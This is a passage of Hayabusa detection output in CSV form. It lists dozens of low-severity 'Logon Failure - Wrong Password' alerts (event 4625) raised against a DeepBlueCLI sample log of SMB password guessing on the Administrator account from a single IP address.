NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.331 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: feu34D0VvoMrnWzo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.369 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mrNRIpCpmAV3npax : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.401 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zpxgEvvoC0stFdTl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.445 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XvpDKRAPDS36sqNL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.496 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4cqJKEIySxiQdCRD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:21.535 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Pm1F7QEwBE054ui0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RvIjhyfdlXiX72Es : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.622 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dJilW4KgIEeh5VNr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2Ka0FYYdVOj90l0L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.715 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B9ZjGE8T6RuGx8SZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.758 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nkti4BGVrpoAQRBL : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.804 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fZy2YJPOg1YZ2bd0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rUE6E9H9i0l0P7Jp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.892 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0Pkpt2nmRorQ3x0o : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.937 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hCZNNzSyi4mLLaxZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.986 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O9ZqF43sDjSirvMK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:22.041 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XOw9DjHISDX57XUe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.083 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rmxFpEQeGsgbXpDy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.129 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MfIVCOOWQS7TNKQA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.172 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uweLaLhvznDee1IF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.221 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oNQcS2BonF12ikiX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.265 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: D43Flf2keSL3aph6 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.307 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zw7nJXNHZ2QNa3In : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.352 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UZp4567BIWAwxF9r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.397 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: S9iVvPuykq62pV9z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.431 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eRVomETC34InuKPk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.473 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VpHfjKgAxChSYz8R : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:22.520 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tIbTy5IDRy90lbUR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.565 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mM6Olq0zYkMlwmrb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.610 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mUehtGEh0EqRHiLP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EhZ2KHmCTonGrXSS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NZea5qiet7vrT3iv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.741 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aNWY8kuJMSy8h0Zk : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.781 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bt9DUQ0mwhkJlTt8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.828 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zXYtsM2MMuNSYtVr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.880 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WgzvsdMN2SU7Knlh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.971 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DxiBYXNCY32yNb6L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cVfJmOxvsp75g3a0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:23.048 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uHp1hlHjD8w3WKt3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.093 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dEeJWAJgOeueYSM9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.136 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tOfPGoUXu932L80d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.181 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NbH4R6GK1PIVT3ij : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PgsJokRd07Nh1lO1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.273 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 11ylyxQyV5HCJ18g : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.322 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Am2qI1ya4wYdqErV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.374 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5o2AmZsYUYmDpWZE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.421 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c0Hd8xWxOxFifJBG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.461 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hlh64Gtfoig2uzOY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.522 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LtK8Hj2kf3dfFSnW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:23.562 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VKUPqxtNqkVqXgTg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.605 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SKSxp87CBg8L8wSi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CpvxvR0ftQs1gdEF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.684 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U9RGDzNMt9fM6rLF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.730 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RvOO9NLhbbKJXQq9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.777 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mDB9bIx7LcoJ6IAU : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.822 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pfJWsGqlQTmFUUPT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.869 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9PRIO3MASsjrdQGs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.906 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: P9QCn4nZHB0ENeA1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.961 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4iUNHB1gE2d1dBfZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.001 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tM3IdtrLdVXQjOjB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:24.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dbmn9Er9e1JZZybc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.102 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SY40ARcAoo9cWQIP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.139 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Fc7m0blzidQfn1BU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 13SkGPbDDXou7qLA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.235 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2YIlJeZpJlvcKgqt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BRhH6atcwLcGmrB4 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.324 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BGIInLsy4UCfl0oW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4qJ7nEN0u9DkVuVH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.413 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6qb85lEENmrj4ebF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.487 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q6RXAj26rnxMmxuL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.533 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tas7cqRNGQw6FlVX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:24.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FQlF8GYIeWytFLsJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.649 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dj48ftx52s1HntRT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.710 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B46vTS9PxUgUblBp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.770 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eoIFbywJEC0QaceV : IP Address: 192.168.198.149 : AuthPackage: 